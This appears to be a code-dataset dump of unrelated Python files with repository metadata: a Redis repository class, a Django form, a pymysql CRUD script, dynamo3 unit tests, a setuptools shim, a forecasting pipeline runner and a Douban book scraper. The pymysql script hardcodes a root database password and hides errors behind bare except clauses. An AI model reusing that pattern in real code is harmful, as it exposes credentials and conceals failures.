class UserRedisRepository(usecases.UserRepository):
def __init__(self, url):
self.client = redis.from_url(url, decode_responses=True)
def list_user(self):
ret = []
for k in self.client.keys('user:*'):
user = usecases.load_user(json.loads(self.client.get(k)))
ret.append(user)
return ret
def find_user(self, user_id):
payload = self.client.get('user:{}'.format(user_id))
if not payload:
return None
return usecases.load_user(json.loads(payload))
def upsert_user(self, user):
self.client.set("user:{}".format(user.id), json.dumps(user.dump()))
def delete_user(self, user):
self.client.delete("user:{}".format(user.id))
|
[
"me@kain-jy.com"
] |
me@kain-jy.com
|
2a09d365cb4047774eb081599078201fca564efa
|
4d8cfbfe6498d0808eefa8983b07940e006c49fb
|
/ges/forms.py
|
7da85805e7e5201851422ce41a3674ddf51edaf3
|
[] |
no_license
|
nikolzp/ges_google
|
4b7d18e4fa039a0d4b21e5d71b2a249df958ed2b
|
fe89f150a624411867877491f127d71eff92bfc9
|
refs/heads/master
| 2020-03-12T00:59:24.072648
| 2018-04-20T14:43:38
| 2018-04-20T14:43:38
| 130,363,767
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 407
|
py
|
from django import forms
class GesFilterForm(forms.Form):
max_power = forms.IntegerField(label='Мощность от МВт', required=False)
min_power = forms.IntegerField(label='Мощность до МВт', required=False)
max_area = forms.IntegerField(label='Объем от кв.км', required=False)
min_area = forms.IntegerField(label='Объем до кв.км', required=False)
|
[
"nikolzp@gmail.com"
] |
nikolzp@gmail.com
|
8c5c25cee31f3dd1e619b8efc727a8ddf6ab0d55
|
0a3a67da5fe86829b61518827b104e82a887f8a9
|
/Create_Insert_Read_Update.py
|
fbe88c5990a7e7e04aad81215131e7f6927f9e75
|
[] |
no_license
|
heeba14/Database_Programing
|
080f50520bc24a1d3c1d8791614c90dc27ea449a
|
b995db179d3edf471429f7d7f0e465392534e02d
|
refs/heads/master
| 2021-04-29T22:53:36.891819
| 2018-02-24T18:09:29
| 2018-02-24T18:09:29
| 121,646,932
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,547
|
py
|
import pymysql
db = pymysql.connect("localhost", "root", "mysql123", "python")
"""Create Table"""
def create_table():
#db = pymysql.connect("localhost", "root", "mysql123", "python")
cursor = db.cursor()
#cursor.execute("DROP TABLE IF EXISTS EMPLOYEE")
sql = """CREATE TABLE Number (
FIRST_NAME TEXT NOT NULL,
LAST_NAME TEXT,
AGE INT )"""
cursor.execute(sql)
#db.close()
"""Insert Table"""
def insert_table():
#db = pymysql.connect("localhost", "root", "mysql123", "python")
cursor = db.cursor()
sql = """INSERT INTO Profile(FIRST_NAME,
LAST_NAME, AGE)
VALUES ('Heeba', 'Kawoosa', 24)"""
try:
cursor.execute(sql)
db.commit()
except:
db.rollback()
#db.close()
""" Read Table """
def read_table():
#db = pymysql.connect("localhost", "root", "mysql123", "python")
cursor = db.cursor()
sql = '''SELECT * FROM Profile'''
try:
cursor.execute(sql)
results = cursor.fetchall()
print(results)
except:
print("Error: unable to fetch data")
#db.close()
""" Update Table """
def update_table():
#db = pymysql.connect("localhost", "root", "mysql123", "python")
cursor = db.cursor()
sql = """UPDATE Profile SET AGE = AGE -1
WHERE First_name = 'Heeba'"""
try:
cursor.execute(sql)
db.commit()
except:
db.rollback()
#db.close()
create_table()
insert_table()
read_table()
update_table()
db.close()
|
[
"heebakawoos93@gmail.com"
] |
heebakawoos93@gmail.com
|
26f47532449dbed8b39096a83f8cc42ae7de4c34
|
4dbe3b1b2af3ff77e8086ec32ab58dcf47849a3e
|
/tests/__init__.py
|
50530a34b837af8bd1a04e3a510f33988b96846e
|
[
"MIT"
] |
permissive
|
mnpk/dynamo3
|
b83dc700345972ea2336ac8ca842fd9f23edf5c2
|
51eacee60bdf8d058831a9ab3583a2cfe9f91ca9
|
refs/heads/master
| 2021-01-16T21:54:32.089114
| 2016-04-30T00:53:55
| 2016-04-30T00:53:55
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 21,985
|
py
|
""" Tests for Dynamo3 """
from __future__ import unicode_literals
import six
from botocore.exceptions import ClientError
from decimal import Decimal
from mock import patch, MagicMock, ANY
from six.moves.cPickle import dumps, loads # pylint: disable=F0401,E0611
from six.moves.urllib.parse import urlparse # pylint: disable=F0401,E0611
from dynamo3 import (DynamoDBConnection, Binary, DynamoKey, Dynamizer, STRING,
ThroughputException, Table, GlobalIndex, DynamoDBError,
Limit)
from dynamo3.result import (add_dicts, Count, Capacity, ConsumedCapacity,
ResultSet)
try:
import unittest2 as unittest # pylint: disable=F0401
except ImportError:
import unittest
if six.PY3:
unittest.TestCase.assertItemsEqual = unittest.TestCase.assertCountEqual
def is_number(value):
""" Check if a value is a float or int """
return isinstance(value, float) or isinstance(value, six.integer_types)
class BaseSystemTest(unittest.TestCase):
""" Base class for system tests """
dynamo = None
def setUp(self):
super(BaseSystemTest, self).setUp()
# Clear out any pre-existing tables
for tablename in self.dynamo.list_tables():
self.dynamo.delete_table(tablename)
def tearDown(self):
super(BaseSystemTest, self).tearDown()
for tablename in self.dynamo.list_tables():
self.dynamo.delete_table(tablename)
self.dynamo.clear_hooks()
class TestMisc(BaseSystemTest):
""" Tests that don't fit anywhere else """
def tearDown(self):
super(TestMisc, self).tearDown()
self.dynamo.default_return_capacity = False
def test_connection_host(self):
""" Connection can access host of endpoint """
urlparse(self.dynamo.host)
def test_connection_region(self):
""" Connection can access name of connected region """
self.assertTrue(isinstance(self.dynamo.region, six.string_types))
def test_connect_to_region_old(self):
""" Can connect to a dynamo region """
conn = DynamoDBConnection.connect_to_region('us-west-1')
self.assertIsNotNone(conn.host)
def test_connect_to_region_creds_old(self):
""" Can connect to a dynamo region with credentials """
conn = DynamoDBConnection.connect_to_region(
'us-west-1', access_key='abc', secret_key='12345')
self.assertIsNotNone(conn.host)
def test_connect_to_host_without_session_old(self):
""" Can connect to a dynamo host without passing in a session """
conn = DynamoDBConnection.connect_to_host(access_key='abc',
secret_key='12345')
self.assertIsNotNone(conn.host)
def test_connect_to_region(self):
""" Can connect to a dynamo region """
conn = DynamoDBConnection.connect('us-west-1')
self.assertIsNotNone(conn.host)
def test_connect_to_region_creds(self):
""" Can connect to a dynamo region with credentials """
conn = DynamoDBConnection.connect(
'us-west-1', access_key='abc', secret_key='12345')
self.assertIsNotNone(conn.host)
def test_connect_to_host_without_session(self):
""" Can connect to a dynamo host without passing in a session """
conn = DynamoDBConnection.connect('us-west-1', host='localhost')
self.assertIsNotNone(conn.host)
@patch('dynamo3.connection.time')
def test_retry_on_throughput_error(self, time):
""" Throughput exceptions trigger a retry of the request """
def call(*_, **__):
""" Dummy service call """
response = {
'ResponseMetadata': {
'HTTPStatusCode': 400,
},
'Error': {
'Code': 'ProvisionedThroughputExceededException',
'Message': 'Does not matter',
}
}
raise ClientError(response, 'list_tables')
with patch.object(self.dynamo, 'client') as client:
client.list_tables.side_effect = call
with self.assertRaises(ThroughputException):
self.dynamo.call('list_tables')
self.assertEqual(len(time.sleep.mock_calls),
self.dynamo.request_retries - 1)
self.assertTrue(time.sleep.called)
def test_describe_missing(self):
""" Describing a missing table returns None """
ret = self.dynamo.describe_table('foobar')
self.assertIsNone(ret)
def test_magic_table_props(self):
""" Table magically looks up properties on response object """
hash_key = DynamoKey('id')
self.dynamo.create_table('foobar', hash_key=hash_key)
ret = self.dynamo.describe_table('foobar')
self.assertIsNotNone(ret.item_count)
with self.assertRaises(AttributeError):
self.assertIsNotNone(ret.crazy_property)
def test_magic_index_props(self):
""" Index magically looks up properties on response object """
index = GlobalIndex.all('idx-name', DynamoKey('id'))
index.response = {
'FooBar': 2
}
self.assertEqual(index.foo_bar, 2)
with self.assertRaises(AttributeError):
self.assertIsNotNone(index.crazy_property)
def test_describe_during_delete(self):
""" Describing a table during a delete operation should not crash """
response = {
'ItemCount': 0,
'ProvisionedThroughput': {
'NumberOfDecreasesToday': 0,
'ReadCapacityUnits': 5,
'WriteCapacityUnits': 5
},
'TableName': 'myTableName',
'TableSizeBytes': 0,
'TableStatus': 'DELETING'
}
table = Table.from_response(response)
self.assertEqual(table.status, 'DELETING')
def test_delete_missing(self):
""" Deleting a missing table returns False """
ret = self.dynamo.delete_table('foobar')
self.assertTrue(not ret)
def test_re_raise(self):
""" DynamoDBError can re-raise itself if missing exc_info """
err = DynamoDBError(400, Code='ErrCode', Message='Ouch', args={})
try:
err.re_raise()
self.assertTrue(False)
except DynamoDBError as e:
self.assertEqual(err, e)
def test_default_return_capacity(self):
""" When default_return_capacity=True, always return capacity """
self.dynamo.default_return_capacity = True
with patch.object(self.dynamo, 'call') as call:
call().get.return_value = None
rs = self.dynamo.scan('foobar')
list(rs)
call.assert_called_with('scan', TableName='foobar',
ReturnConsumedCapacity='INDEXES')
def test_list_tables_page(self):
    """ Call to ListTables should page results """
    # Asking for 110 of 120 tables forces the iterator to issue more
    # than one ListTables request and stitch the pages together.
    hash_key = DynamoKey('id')
    for i in range(120):
        self.dynamo.create_table('table%d' % i, hash_key=hash_key)
    tables = list(self.dynamo.list_tables(110))
    self.assertEqual(len(tables), 110)
def test_limit_complete(self):
    """ A limit with item_capacity = 0 is 'complete' """
    # A zero item_limit means "fetch nothing", so the Limit reports
    # itself as already satisfied before any request is made.
    limit = Limit(item_limit=0)
    self.assertTrue(limit.complete)
class TestDataTypes(BaseSystemTest):
    """ Tests for Dynamo data types """

    def make_table(self):
        """ Convenience method for making a table """
        hash_key = DynamoKey('id')
        self.dynamo.create_table('foobar', hash_key=hash_key)

    def test_string(self):
        """ Store and retrieve a string """
        self.make_table()
        self.dynamo.put_item('foobar', {'id': 'abc'})
        item = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(item['id'], 'abc')
        self.assertTrue(isinstance(item['id'], six.text_type))

    def test_int(self):
        """ Store and retrieve an int """
        self.make_table()
        self.dynamo.put_item('foobar', {'id': 'a', 'num': 1})
        item = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(item['num'], 1)

    def test_float(self):
        """ Store and retrieve a float """
        self.make_table()
        self.dynamo.put_item('foobar', {'id': 'a', 'num': 1.1})
        item = list(self.dynamo.scan('foobar'))[0]
        # Dynamo numbers round-trip as Decimal; compare via float.
        self.assertAlmostEqual(float(item['num']), 1.1)

    def test_decimal(self):
        """ Store and retrieve a Decimal """
        self.make_table()
        self.dynamo.put_item('foobar', {'id': 'a', 'num': Decimal('1.1')})
        item = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(item['num'], Decimal('1.1'))

    def test_binary(self):
        """ Store and retrieve a binary """
        self.make_table()
        self.dynamo.put_item('foobar', {'id': 'a', 'data': Binary('abc')})
        item = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(item['data'].value, b'abc')

    def test_binary_bytes(self):
        """ Store and retrieve bytes as a binary """
        self.make_table()
        data = {'a': 1, 'b': 2}
        # Pickled bytes must round-trip through Binary untouched.
        self.dynamo.put_item('foobar', {'id': 'a',
                                        'data': Binary(dumps(data))})
        item = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(loads(item['data'].value), data)

    def test_string_set(self):
        """ Store and retrieve a string set """
        self.make_table()
        item = {
            'id': 'a',
            'datas': set(['a', 'b']),
        }
        self.dynamo.put_item('foobar', item)
        ret = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(ret, item)

    def test_number_set(self):
        """ Store and retrieve a number set """
        self.make_table()
        item = {
            'id': 'a',
            'datas': set([1, 2, 3]),
        }
        self.dynamo.put_item('foobar', item)
        ret = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(ret, item)

    def test_binary_set(self):
        """ Store and retrieve a binary set """
        self.make_table()
        item = {
            'id': 'a',
            'datas': set([Binary('a'), Binary('b')]),
        }
        self.dynamo.put_item('foobar', item)
        ret = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(ret, item)

    def test_binary_equal(self):
        """ Binary should eq other Binaries and also raw bytestrings """
        self.assertEqual(Binary('a'), Binary('a'))
        self.assertEqual(Binary('a'), b'a')
        self.assertFalse(Binary('a') != Binary('a'))

    def test_binary_repr(self):
        """ Binary repr should wrap the contained value """
        self.assertEqual(repr(Binary('a')), 'Binary(%s)' % b'a')

    def test_binary_converts_unicode(self):
        """ Binary will convert unicode to bytes """
        b = Binary('a')
        self.assertTrue(isinstance(b.value, six.binary_type))

    def test_binary_force_string(self):
        """ Binary must wrap a string type """
        with self.assertRaises(TypeError):
            Binary(2)

    def test_bool(self):
        """ Store and retrieve a boolean """
        self.make_table()
        self.dynamo.put_item('foobar', {'id': 'abc', 'b': True})
        item = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(item['b'], True)
        # Must be a real bool, not a number that merely compares equal.
        self.assertTrue(isinstance(item['b'], bool))

    def test_list(self):
        """ Store and retrieve a list """
        self.make_table()
        self.dynamo.put_item('foobar', {'id': 'abc', 'l': ['a', 1, False]})
        item = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(item['l'], ['a', 1, False])

    def test_dict(self):
        """ Store and retrieve a dict """
        self.make_table()
        data = {
            'i': 1,
            's': 'abc',
            'n': None,
            'l': ['a', 1, True],
            'b': False,
        }
        self.dynamo.put_item('foobar', {'id': 'abc', 'd': data})
        item = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(item['d'], data)

    def test_nested_dict(self):
        """ Store and retrieve a nested dict """
        self.make_table()
        data = {
            's': 'abc',
            'd': {
                'i': 42,
            },
        }
        self.dynamo.put_item('foobar', {'id': 'abc', 'd': data})
        item = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(item['d'], data)

    def test_nested_list(self):
        """ Store and retrieve a nested list """
        self.make_table()
        data = [
            1,
            [
                True,
                None,
                'abc',
            ],
        ]
        self.dynamo.put_item('foobar', {'id': 'abc', 'l': data})
        item = list(self.dynamo.scan('foobar'))[0]
        self.assertEqual(item['l'], data)

    def test_unrecognized_type(self):
        """ Dynamizer throws error on unrecognized type """
        # 'ASDF' is not a valid DynamoDB type tag.
        value = {
            'ASDF': 'abc',
        }
        with self.assertRaises(TypeError):
            self.dynamo.dynamizer.decode(value)
class TestDynamizer(unittest.TestCase):
    """ Tests for the Dynamizer """

    def test_register_encoder(self):
        """ Can register a custom encoder """
        from datetime import datetime
        dynamizer = Dynamizer()
        # Encoders map a python type to a (dynamo type tag, value) pair.
        dynamizer.register_encoder(datetime, lambda d, v:
                                   (STRING, v.isoformat()))
        now = datetime.utcnow()
        self.assertEqual(dynamizer.raw_encode(now), (STRING, now.isoformat()))

    def test_encoder_missing(self):
        """ If no encoder is found, raise ValueError """
        from datetime import datetime
        dynamizer = Dynamizer()
        # A bare Dynamizer has no datetime encoder registered.
        with self.assertRaises(ValueError):
            dynamizer.encode(datetime.utcnow())
class TestResultModels(unittest.TestCase):
    """ Tests for the model classes in results.py """

    def test_add_dicts_base_case(self):
        """ add_dict where one argument is None returns the other """
        f = object()
        self.assertEqual(add_dicts(f, None), f)
        self.assertEqual(add_dicts(None, f), f)

    def test_add_dicts(self):
        """ Merge two dicts of values together """
        a = {
            'a': 1,
            'b': 2,
        }
        b = {
            'a': 3,
            'c': 4,
        }
        # Values under shared keys are summed, not replaced.
        ret = add_dicts(a, b)
        self.assertEqual(ret, {
            'a': 4,
            'b': 2,
            'c': 4,
        })

    def test_count_repr(self):
        """ Count repr """
        count = Count(0, 0)
        self.assertEqual(repr(count), "Count(0)")

    def test_count_addition(self):
        """ Count addition """
        count = Count(4, 2)
        self.assertEqual(count + 5, 9)

    def test_count_subtraction(self):
        """ Count subtraction """
        count = Count(4, 2)
        self.assertEqual(count - 2, 2)

    def test_count_multiplication(self):
        """ Count multiplication """
        count = Count(4, 2)
        self.assertEqual(2 * count, 8)

    def test_count_division(self):
        """ Count division """
        count = Count(4, 2)
        self.assertEqual(count / 2, 2)

    def test_count_add_none_capacity(self):
        """ Count addition with one None consumed_capacity """
        cap = Capacity.create_read({'CapacityUnits': 3})
        count = Count(4, 2)
        count2 = Count(5, 3, cap)
        ret = count + count2
        self.assertEqual(ret, 9)
        self.assertEqual(ret.scanned_count, 5)
        # The single non-None capacity is carried through unchanged.
        self.assertEqual(ret.consumed_capacity, cap)

    def test_count_add_capacity(self):
        """ Count addition with consumed_capacity """
        count = Count(4, 2, Capacity.create_read({'CapacityUnits': 3}))
        count2 = Count(5, 3, Capacity.create_read({'CapacityUnits': 2}))
        ret = count + count2
        self.assertEqual(ret, 9)
        self.assertEqual(ret.scanned_count, 5)
        # Capacities are summed alongside the counts.
        self.assertEqual(ret.consumed_capacity.read, 5)

    def test_capacity_factories(self):
        """ Capacity.create_(read|write) factories """
        cap = Capacity.create_read({'CapacityUnits': 3})
        self.assertEqual(cap.read, 3)
        self.assertEqual(cap.write, 0)
        cap = Capacity.create_write({'CapacityUnits': 3})
        self.assertEqual(cap.write, 3)
        self.assertEqual(cap.read, 0)

    def test_capacity_math(self):
        """ Capacity addition and equality """
        cap = Capacity(2, 4)
        # Set membership exercises both __hash__ and __eq__.
        s = set([cap])
        self.assertIn(Capacity(2, 4), s)
        self.assertNotEqual(Capacity(1, 4), cap)
        self.assertEqual(Capacity(1, 1) + Capacity(2, 2), Capacity(3, 3))

    def test_capacity_format(self):
        """ String formatting for Capacity """
        c = Capacity(1, 3)
        self.assertEqual(str(c), "R:1.0 W:3.0")
        # All-zero capacity collapses to a bare "0".
        c = Capacity(0, 0)
        self.assertEqual(str(c), "0")

    def test_total_consumed_capacity(self):
        """ ConsumedCapacity can parse results with only Total """
        response = {
            'TableName': 'foobar',
            'CapacityUnits': 4,
        }
        cap = ConsumedCapacity.from_response(response, True)
        self.assertEqual(cap.total.read, 4)
        self.assertIsNone(cap.table_capacity)

    def test_consumed_capacity_equality(self):
        """ ConsumedCapacity addition and equality """
        cap = ConsumedCapacity('foobar', Capacity(0, 10), Capacity(0, 2), {
            'l-index': Capacity(0, 4),
        }, {
            'g-index': Capacity(0, 3),
        })
        c2 = ConsumedCapacity('foobar', Capacity(0, 10), Capacity(0, 2), {
            'l-index': Capacity(0, 4),
            'l-index2': Capacity(0, 7),
        })
        self.assertNotEqual(cap, c2)
        c3 = ConsumedCapacity('foobar', Capacity(0, 10), Capacity(0, 2), {
            'l-index': Capacity(0, 4),
        }, {
            'g-index': Capacity(0, 3),
        })
        self.assertIn(cap, set([c3]))
        # Addition merges per-index capacities key-by-key.
        combined = cap + c2
        self.assertEqual(
            cap + c2,
            ConsumedCapacity('foobar', Capacity(0, 20), Capacity(0, 4),
                             {'l-index': Capacity(0, 8), 'l-index2': Capacity(0, 7), },
                             {'g-index': Capacity(0, 3), }))
        self.assertIn(str(Capacity(0, 3)), str(combined))

    def test_add_different_tables(self):
        """ Cannot add ConsumedCapacity of two different tables """
        c1 = ConsumedCapacity('foobar', Capacity(1, 28))
        c2 = ConsumedCapacity('boofar', Capacity(3, 0))
        with self.assertRaises(TypeError):
            c1 += c2

    def test_always_continue_query(self):
        """ Regression test.
        If result has no items but does have LastEvaluatedKey, keep querying.
        """
        conn = MagicMock()
        conn.dynamizer.decode_keys.side_effect = lambda x: x
        items = ['a', 'b']
        results = [
            {'Items': [], 'LastEvaluatedKey': {'foo': 1, 'bar': 2}},
            {'Items': [], 'LastEvaluatedKey': {'foo': 1, 'bar': 2}},
            {'Items': items},
        ]
        # Each call pops the next canned page off the list.
        conn.call.side_effect = lambda *_, **__: results.pop(0)
        rs = ResultSet(conn, Limit())
        results = list(rs)
        self.assertEqual(results, items)
class TestHooks(BaseSystemTest):
    """ Tests for connection callback hooks """

    def tearDown(self):
        super(TestHooks, self).tearDown()
        # Drain every hook list so subscriptions don't leak between tests.
        for hooks in six.itervalues(self.dynamo._hooks):
            while hooks:
                hooks.pop()

    def test_precall(self):
        """ precall hooks are called before an API call """
        hook = MagicMock()
        self.dynamo.subscribe('precall', hook)

        def throw(**_):
            """ Throw an exception to terminate the request """
            raise Exception()

        with patch.object(self.dynamo, 'client') as client:
            client.describe_table.side_effect = throw
            with self.assertRaises(Exception):
                self.dynamo.describe_table('foobar')
        # The hook fires even though the API call itself blew up.
        hook.assert_called_with(
            self.dynamo, 'describe_table', {
                'TableName': 'foobar'})

    def test_postcall(self):
        """ postcall hooks are called after API call """
        hash_key = DynamoKey('id')
        self.dynamo.create_table('foobar', hash_key=hash_key)
        calls = []

        def hook(*args):
            """ Log the call into a list """
            calls.append(args)

        self.dynamo.subscribe('postcall', hook)
        self.dynamo.describe_table('foobar')
        self.assertEqual(len(calls), 1)
        args = calls[0]
        # Hook receives (connection, command, kwargs, response).
        self.assertEqual(len(args), 4)
        conn, command, kwargs, response = args
        self.assertEqual(conn, self.dynamo)
        self.assertEqual(command, 'describe_table')
        self.assertEqual(kwargs['TableName'], 'foobar')
        self.assertEqual(response['Table']['TableName'], 'foobar')

    def test_capacity(self):
        """ capacity hooks are called whenever response has ConsumedCapacity """
        hash_key = DynamoKey('id')
        self.dynamo.create_table('foobar', hash_key=hash_key)
        hook = MagicMock()
        self.dynamo.subscribe('capacity', hook)
        with patch.object(self.dynamo, 'client') as client:
            client.scan.return_value = {
                'Items': [],
                'ConsumedCapacity': {
                    'TableName': 'foobar',
                    'CapacityUnits': 4,
                }
            }
            rs = self.dynamo.scan('foobar')
            list(rs)
        # The raw ConsumedCapacity dict is parsed into a ConsumedCapacity
        # object before being handed to the hook.
        cap = ConsumedCapacity('foobar', Capacity(4, 0))
        hook.assert_called_with(self.dynamo, 'scan', ANY, ANY, cap)

    def test_subscribe(self):
        """ Can subscribe and unsubscribe from hooks """
        hook = object()
        self.dynamo.subscribe('precall', hook)
        self.assertEqual(len(self.dynamo._hooks['precall']), 1)
        self.dynamo.unsubscribe('precall', hook)
        self.assertEqual(len(self.dynamo._hooks['precall']), 0)
|
[
"stevearc@stevearc.com"
] |
stevearc@stevearc.com
|
58bf50dfa1ff9df3fb85f9ea8137e332a7d6b16b
|
913874feee8362473286fd29a2697958d87098c0
|
/testcases/venv/bin/easy_install-3.6
|
6ed6ca7c2fd76d56fa7e9cf006bddac55cf0f8ef
|
[] |
no_license
|
Linestro/transpy
|
2a3d3c011ec746f23bdf5b4c93f1762cc5ac2ae5
|
ea1d93df8dd0c1fa77f0d1cbd34efe719d7a20f9
|
refs/heads/master
| 2020-05-25T00:37:49.305807
| 2019-05-17T19:43:06
| 2019-05-17T19:43:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 459
|
6
|
#!/home/hxzhu/Documents/sdh_mono-master/testcases/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.6'
# Auto-generated console-script shim: resolves and runs the
# 'easy_install-3.6' entry point pinned to setuptools 40.8.0.
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point

if __name__ == '__main__':
    # Strip a '-script.py'/'.exe' suffix so argv[0] matches the command name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(
        load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.6')()
    )
|
[
"hxzhu@umich.edu"
] |
hxzhu@umich.edu
|
9b51264685632fddec2373e3a341f25d8d1d3fc9
|
e00fe1e065b448f6f8c0472ed2b8a39991fa7b1b
|
/Fuzzy_clustering/version2/template/project_run.py
|
4188a8c1f9dfdd2d18eda05f8e884d4dcc2f62af
|
[
"Apache-2.0"
] |
permissive
|
joesider9/forecasting_library
|
1a4ded5b09fc603f91fa1c075e79fc2ed06c08a8
|
db07ff8f0f2693983058d49004f2fc6f8849d197
|
refs/heads/master
| 2023-03-29T12:18:22.261488
| 2021-04-01T08:57:08
| 2021-04-01T08:57:08
| 319,906,316
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,106
|
py
|
from Fuzzy_clustering.version2.project_managers.project_eval_manager import ProjectsEvalManager
from Fuzzy_clustering.version2.project_managers.projects_data_manager import ProjectsDataManager
from Fuzzy_clustering.version2.project_managers.projects_train_manager import ProjectsTrainManager
from Fuzzy_clustering.version2.template.constants import *
from Fuzzy_clustering.version2.template.util_database_timos import write_database
def prepare_data():
    """Extract NWP data, build datasets, and wire up project relations.

    Raises RuntimeError as soon as any stage reports a non-DONE status.
    When the data manager exposes an evaluation split (``data_eval``),
    extraction and dataset creation are repeated with ``is_test=True``.
    """
    static_data = write_database()
    project_data_manager = ProjectsDataManager(static_data, is_test=False)
    nwp_response = project_data_manager.nwp_extractor()
    if nwp_response == DONE:
        data_response = project_data_manager.create_datasets()
    else:
        raise RuntimeError('Something was going wrong with nwp extractor')
    if data_response == DONE:
        project_data_manager.create_projects_relations()
    else:
        raise RuntimeError('Something was going wrong with data manager')
    if hasattr(project_data_manager, 'data_eval'):
        # Re-run extraction and dataset creation for the held-out
        # evaluation period.
        project_data_manager.is_test = True
        nwp_response = project_data_manager.nwp_extractor()
        if nwp_response == DONE:
            nwp_response = project_data_manager.create_datasets()
            if nwp_response != DONE:
                raise RuntimeError('Something was going wrong with on evaluation dataset creator')
        else:
            raise RuntimeError('Something was going wrong with nwp extractor on evaluation')
    print("Data is prepared, training can start")
def train_project():
    """Load the static configuration and train every project's models."""
    config = write_database()
    ProjectsTrainManager(config).fit()
def eval_project():
    """Load the static configuration and evaluate every trained project."""
    config = write_database()
    ProjectsEvalManager(config).evaluate()
def backup_project():
    """Load the static configuration and clear stale project backups."""
    config = write_database()
    ProjectsTrainManager(config).clear_backup_projects()
if __name__ == '__main__':
    # Full pipeline: build datasets, train, evaluate, then prune backups.
    prepare_data()
    train_project()
    eval_project()
    backup_project()
|
[
"joesider9@gmail.com"
] |
joesider9@gmail.com
|
20821475d51ca2148fae3ad69aa416f7dfa372ce
|
87cb949ba0e4159cf698280f241590442d1ea62b
|
/airflow_pipeline/extract_entities_debug.py
|
607b57a327608e2238f91ebac1d67a81d2d4d50c
|
[] |
no_license
|
ePlusPS/emr-workflow
|
000fea60563be659d4df266b873bea32713c1b9f
|
f894d353f647feb8c1ce30083d91d5e070b7d6c6
|
refs/heads/main
| 2023-08-10T07:48:35.904011
| 2020-08-21T00:32:12
| 2020-08-21T00:32:12
| 233,957,297
| 0
| 3
| null | 2023-07-25T15:11:32
| 2020-01-14T23:37:03
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 111
|
py
|
# Debug driver: run the entity post-processing on a toy tagged string.
from create_entity_columns import extract_entities

# Input mimics tokens suffixed with BIO-style entity tags, e.g. "[B-MEDICATION]".
extract_entities('asdf[B-MEDICATION] asdfasdf[B-FEATURE]')
|
[
"Morgan.Worthington@eplus.com"
] |
Morgan.Worthington@eplus.com
|
044b8d3b432a0465426ab35095611881bb8b52c6
|
3fd76a49e0cb7dedd0113abc9fe25d49c96c7610
|
/demo01.py
|
d6d8258fd3c34de89cf6138bf25e91de3f42e6dd
|
[] |
no_license
|
SnowSuo/python
|
4fd51a970139a1eff0097a03534af40e091f3497
|
bbf6691efdfaacd93d674160dc2cd3a03f3e9f6e
|
refs/heads/master
| 2021-07-02T09:10:50.063051
| 2018-06-19T12:49:31
| 2018-06-19T12:49:31
| 130,447,868
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,053
|
py
|
#-*- coding:utf-8 -*-
'''
=============================
Scrape the Douban Books Top 250 chart and persist the scraped
records to a JSON file.
@copyright:Chinasoft international .ETC
@author:SnowSuo
@date:2018-05-02
'''
# Imports
import urllib.request
import re
import os
import json

# Fetch the chart page.
url = 'https://book.douban.com/top250?icn=index-book250-all'
response = urllib.request.urlopen(url)
content = response.read().decode('utf-8')

# Regexes that carve the wanted fields out of each record's markup.
regcontent = re.compile(r'<tr class="item">(.*?)</tr>', re.S)
regTitle = re.compile(r'<div class="pl2"><a.*?title="(.*?)">')
regLinks = re.compile(r'<a href="(.*?)".*?>')
regRatings = re.compile(r'<span class="rating_nums">(.*?)</span>')
regprice = re.compile(r'<p class="pl">(.*?)</p>')
lstcontent = regcontent.findall(content)

# Accumulates one dict per book.
data = []
for item in lstcontent:
    # Collapse runs of whitespace/newlines inside the record markup.
    regExp = re.compile(r'[\s\n]{2,}')
    # BUG FIX: this assignment was commented out, so every use of
    # 'blockcode' below raised NameError on the first loop iteration.
    blockcode = regExp.sub('', item)
    # Dict holding the fields extracted from this record.
    dictbook = {}
    # Book title.
    lstTitle = regTitle.findall(blockcode)
    print(lstTitle)
    dictbook['title'] = lstTitle
    # Link to the book's page.
    lstLink = regLinks.findall(blockcode)
    print(lstLink)
    dictbook['link'] = lstLink
    # Rating.
    lstRating = regRatings.findall(blockcode)
    print(lstRating)
    dictbook['rating'] = lstRating
    # Author/price line (extracted and printed but not stored, as before).
    lstPrice = regprice.findall(blockcode)
    print(lstPrice)
    # Append the completed record to the result list.
    data.append(dictbook)
    print('='*30)

# Directory where the JSON file is written.
dataDir = os.path.join(os.getcwd(), '.vscode/模块编程/data')
if not os.path.exists(dataDir):
    # BUG FIX: os.mkdir fails when intermediate directories are missing;
    # makedirs creates the whole path.
    os.makedirs(dataDir)

# Serialize the records to a JSON file (keep non-ASCII text readable).
with open(dataDir+os.sep+'bookdata.json', 'w', encoding='utf-8') as jsonfile:
    json.dump(data, jsonfile, ensure_ascii=False)
print('>>>>json文件写入完毕')
|
[
"yonggang.suo@hotmail.com"
] |
yonggang.suo@hotmail.com
|
92208027272a6e16363b60e6e399cc6ec08fcbb5
|
f3d757f421497e19f2de0d3be21b9ae381511577
|
/phoneconfirmation/urls.py
|
57e758f3e36f49419e6051dbeed37811f6ed3296
|
[
"MIT"
] |
permissive
|
pinax/pinax-phone-confirmation
|
526ba350a5bbaaa58f229fad224cf9db41f5bcbc
|
102d997db0a7cc00bd862a94987338c25ba24f98
|
refs/heads/master
| 2023-06-22T15:57:32.364754
| 2019-04-11T23:59:58
